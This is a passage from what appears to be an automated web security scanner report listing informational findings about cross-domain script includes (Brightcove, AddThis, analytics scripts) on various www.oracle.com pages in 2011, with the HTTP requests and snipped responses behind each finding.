<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.142. http://www.oracle.com/as/corporate/contact/cambodia-316193-en-as.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/as/corporate/contact/cambodia-316193-en-as.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /as/corporate/contact/cambodia-316193-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

20.143. http://www.oracle.com/as/corporate/contact/laos-316260-en-as.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/as/corporate/contact/laos-316260-en-as.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /as/corporate/contact/laos-316260-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

20.144. http://www.oracle.com/as/corporate/contact/maldives-316209-en-as.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/as/corporate/contact/maldives-316209-en-as.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /as/corporate/contact/maldives-316209-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

20.145. http://www.oracle.com/as/corporate/contact/nepal-316215-en-as.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/as/corporate/contact/nepal-316215-en-as.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /as/corporate/contact/nepal-316215-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

20.146. http://www.oracle.com/as/corporate/contact/pakistan-316185-en-as.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/as/corporate/contact/pakistan-316185-en-as.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /as/corporate/contact/pakistan-316185-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=0;ecid=41104347125119295,0:1)
Date: Tue, 06 Sep 2011 16:17:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.147. http://www.oracle.com/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /index.html HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=0;ecid=35807978136234850,0:1)
Content-Length: 138644
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:53:59 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.148. http://www.oracle.com/openworld/connect/face-to-face/welcome-reception/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/openworld/connect/face-to-face/welcome-reception/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://www.oracleimg.com/us/assets/metrics/ora_openworld2011.js
https://oracleus.wingateweb.com/portal/analytics/s_code.js

Request

GET /openworld/connect/face-to-face/welcome-reception/index.html HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/openworld/learn/other/oracle-university/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gpv_p24=no%20value; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_nr=1315343415620; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Flearn%2Fother%2Foracle-university%2Findex.html; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41159318411124786,0:1)
Content-Length: 41716
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:10:16 GMT
Connection: close

<!DOCTYPE html>

<html id="top">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undefined";
var g_HttpRelativeWebRoot =
...[SNIP]...
</script>
<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://oracleus.wingateweb.com/portal/analytics/s_code.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_openworld2011.js"></script>
...[SNIP]...

20.149. http://www.oracle.com/openworld/connect/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/openworld/connect/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://www.oracleimg.com/us/assets/metrics/ora_openworld2011.js
https://oracleus.wingateweb.com/portal/analytics/s_code.js

Request

GET /openworld/connect/index.html HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/openworld/learn/other/oracle-university/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_pers=%20s_nr%3D1315343775191%7C1317935775191%3B%20gpv_p24%3Dno%2520value%7C1315345575196%3B%20gpw_e24%3Dno%2520value%7C1315345575201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleotnlive%253D%252526pid%25253Dotn%2525253Aen-us%2525253A%2525252Fcommunity%2525252Fdeveloper-vm%2525252F%252526pidt%25253D1%252526oid%25253Dotn%2525253Aen%2525253Ahnav%2525253Astore%2525253Astoredatabase%2525253Astoredatabaseseeall%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; s_cc=true; gpv_p24=no%20value; s_nr=1315343822428; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Flearn%2Fother%2Foracle-university%2Findex.html; s_sq=oracleblogs%3D%2526pid%253Dblogs%25253Aen-us%25253A%25252Fotn%25252Fentry%25252Fbea_welcome_and_oracles_middle%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fblogs.oracle.com%25252Froller-ui%25252Flogin-redirect.rol%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41171155341409016,0:1)
Content-Length: 45092
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:17:03 GMT
Connection: close

<!DOCTYPE html>

<html id="top">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undefined";
var g_HttpRelativeWebRoot =
...[SNIP]...
</script>
<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://oracleus.wingateweb.com/portal/analytics/s_code.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_openworld2011.js"></script>
...[SNIP]...

20.150. http://www.oracle.com/openworld/contact/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/openworld/contact/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://www.oracleimg.com/us/assets/metrics/ora_openworld2011.js
https://oracleus.wingateweb.com/portal/analytics/s_code.js

Request

GET /openworld/contact/index.html HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/openworld/tools/mobile/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.GetCourseDesc?page_id=1&dc=D70302_1353145&p_preview=N; p_org_id=1001; p_lang=US; gpv_p24=no%20value; s_cc=true; s_wgw_lv=1315342700612; s_wgw_lv_s=First%20Visit; s_nr6=1315342700613-New; s_nr=1315342700893; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html; s_sq=winweboracle%3D%2526pid%253Dhttp%25253A%252F%252Fwww.oracle.com%252Fopenworld%252Ftools%252Fmobile%252Findex.html%2526oid%253Dhttp%25253A%252F%252Fwww.oracle.com%252Fopenworld%252Fcontact%252Findex.html%2526ot%253DA

Response

20.151. http://www.oracle.com/openworld/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/openworld/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://www.oracleimg.com/us/assets/metrics/ora_openworld2011.js
https://oracleus.wingateweb.com/portal/analytics/s_code.js

Request

GET /openworld/index.html HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.GetCourseDesc?page_id=1&dc=D70302_1353145&p_preview=N; p_org_id=1001; p_lang=US; s_cc=true; s_nr=1315342573329; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=oracleopenworld%3D%2526pid%253DSearch%25253A%252520OpenWorld%25253A%252520No%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//www.oracle.com/sitemaps/sitemaps.html%2526ot%253DA

Response

20.152. http://www.oracle.com/openworld/learn/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/openworld/learn/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://www.oracleimg.com/us/assets/metrics/ora_openworld2011.js
https://oracleus.wingateweb.com/portal/analytics/s_code.js

Request

GET /openworld/learn/index.html HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/openworld/tools/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.GetCourseDesc?page_id=1&dc=D70302_1353145&p_preview=N; p_org_id=1001; p_lang=US; gpv_p24=no%20value; s_cc=true; s_wgw_lv=1315342712989; s_wgw_lv_s=First%20Visit; s_nr6=1315342712990-New; s_nr=1315342713019; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Ftools%2Findex.html; s_sq=winweboracle%3D%2526pid%253Dhttp%25253A%252F%252Fwww.oracle.com%252Fopenworld%252Ftools%252Findex.html%2526oid%253Dhttp%25253A%252F%252Fwww.oracle.com%252Fopenworld%252Flearn%252Findex.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35690098465744975,0:1)
Content-Length: 41648
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:58:34 GMT
Connection: close

<!DOCTYPE html>

<html id="top">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undefined";
var g_HttpRelativeWebRoot =
...[SNIP]...
</script>
<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://oracleus.wingateweb.com/portal/analytics/s_code.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_openworld2011.js"></script>
...[SNIP]...

20.153. http://www.oracle.com/openworld/learn/other/general-sessions/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/openworld/learn/other/general-sessions/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://www.oracleimg.com/us/assets/metrics/ora_openworld2011.js
https://oracleus.wingateweb.com/portal/analytics/s_code.js

Request

GET /openworld/learn/other/general-sessions/index.html HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/openworld/learn/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.GetCourseDesc?page_id=1&dc=D70302_1353145&p_preview=N; p_org_id=1001; p_lang=US; gpv_p24=no%20value; s_cc=true; s_wgw_lv=1315343371334; s_wgw_lv_s=First%20Visit; s_nr6=1315343371336-New; s_nr=1315343371394; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Flearn%2Findex.html; s_sq=winweboracle%3D%2526pid%253Dhttp%25253A%252F%252Fwww.oracle.com%252Fopenworld%252Flearn%252Findex.html%2526oid%253Dhttp%25253A%252F%252Fwww.oracle.com%252Fopenworld%252Flearn%252Fother%252Fgeneral-sessions%252Findex.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=35734164830875811,0:1)
Content-Length: 85660
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:09:32 GMT
Connection: close

<!DOCTYPE html>

<html id="top">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undefined";
var g_HttpRelativeWebRoot =
...[SNIP]...
</script>
<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://oracleus.wingateweb.com/portal/analytics/s_code.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_openworld2011.js"></script>
...[SNIP]...

20.154. http://www.oracle.com/openworld/learn/other/oracle-university/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/openworld/learn/other/oracle-university/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://www.oracleimg.com/us/assets/metrics/ora_openworld2011.js
https://oracleus.wingateweb.com/portal/analytics/s_code.js

Request

GET /openworld/learn/other/oracle-university/index.html HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/openworld/learn/other/general-sessions/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.GetCourseDesc?page_id=1&dc=D70302_1353145&p_preview=N; p_org_id=1001; p_lang=US; gpv_p24=no%20value; s_cc=true; s_wgw_lv=1315343376138; s_wgw_lv_s=First%20Visit; s_nr6=1315343376139-New; s_nr=1315343376187; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Flearn%2Fother%2Fgeneral-sessions%2Findex.html; s_sq=winweboracle%3D%2526pid%253Dhttp%25253A%252F%252Fwww.oracle.com%252Fopenworld%252Flearn%252Fother%252Fgeneral-sessions%252Findex.html%2526oid%253Dhttp%25253A%252F%252Fwww.oracle.com%252Fopenworld%252Flearn%252Fother%252Foracle-university%252Findex.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35734809075979073,0:1)
Content-Length: 69307
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:09:41 GMT
Connection: close

<!DOCTYPE html>

<html id="top">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undefined";
var g_HttpRelativeWebRoot =
...[SNIP]...
</script>
<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://oracleus.wingateweb.com/portal/analytics/s_code.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_openworld2011.js"></script>
...[SNIP]...

20.155. http://www.oracle.com/openworld/register/packages/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/openworld/register/packages/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://www.oracleimg.com/us/assets/metrics/ora_openworld2011.js
https://oracleus.wingateweb.com/portal/analytics/s_code.js

Request

Response

20.156. http://www.oracle.com/openworld/tools/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/openworld/tools/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://www.oracleimg.com/us/assets/metrics/ora_openworld2011.js
https://oracleus.wingateweb.com/portal/analytics/s_code.js

Request

GET /openworld/tools/index.html HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/openworld/contact/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.GetCourseDesc?page_id=1&dc=D70302_1353145&p_preview=N; p_org_id=1001; p_lang=US; gpv_p24=no%20value; s_cc=true; s_wgw_lv=1315342709171; s_wgw_lv_s=First%20Visit; s_nr6=1315342709172-New; s_nr=1315342709203; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Fcontact%2Findex.html; s_sq=winweboracle%3D%2526pid%253Dhttp%25253A%252F%252Fwww.oracle.com%252Fopenworld%252Fcontact%252Findex.html%2526oid%253Dhttp%25253A%252F%252Fwww.oracle.com%252Fopenworld%252Ftools%252Findex.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35689772048225917,0:1)
Content-Length: 41186
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:58:29 GMT
Connection: close

<!DOCTYPE html>

<html id="top">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undefined";
var g_HttpRelativeWebRoot =
...[SNIP]...
</script>
<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://oracleus.wingateweb.com/portal/analytics/s_code.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_openworld2011.js"></script>
...[SNIP]...

20.157. http://www.oracle.com/openworld/tools/mobile/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/openworld/tools/mobile/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://www.oracleimg.com/us/assets/metrics/ora_openworld2011.js
https://oracleus.wingateweb.com/portal/analytics/s_code.js

Request

GET /openworld/tools/mobile/index.html HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/openworld/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.GetCourseDesc?page_id=1&dc=D70302_1353145&p_preview=N; p_org_id=1001; p_lang=US; gpv_p24=no%20value; s_cc=true; s_wgw_lv=1315342614699; s_wgw_lv_s=First%20Visit; s_nr6=1315342614700-New; s_nr=1315342614766; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Findex.html; s_sq=winweboracle%3D%2526pid%253Dhttp%25253A%252F%252Fwww.oracle.com%252Fopenworld%252Findex.html%2526oid%253Dhttp%25253A%252F%252Fwww.oracle.com%252Fopenworld%252Ftools%252Fmobile%252Findex.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35932300261399681,0:1)
Content-Length: 41094
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:56:55 GMT
Connection: close

<!DOCTYPE html>

<html id="top">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undefined";
var g_HttpRelativeWebRoot =
...[SNIP]...
</script>
<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://oracleus.wingateweb.com/portal/analytics/s_code.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_openworld2011.js"></script>
...[SNIP]...

20.158. http://www.oracle.com/partners/admin/web_account.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/partners/admin/web_account.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js
http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js

Request

GET /partners/admin/web_account.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (M;max-age=300+0;age=0;ecid=35730453979073041,0:1)
Date: Tue, 06 Sep 2011 16:08:34 GMT
Content-Length: 26901
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta content="text/html; charset=utf-8" http-equiv="Content-Type" /><script type="text/javascript">
var _U = "undef
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js"></script>
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

20.159. http://www.oracle.com/partners/en/how-to-do-business/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/partners/en/how-to-do-business/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_opn.js

Request

GET /partners/en/how-to-do-business/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

20.160. http://www.oracle.com/partners/en/join-now/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/partners/en/join-now/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

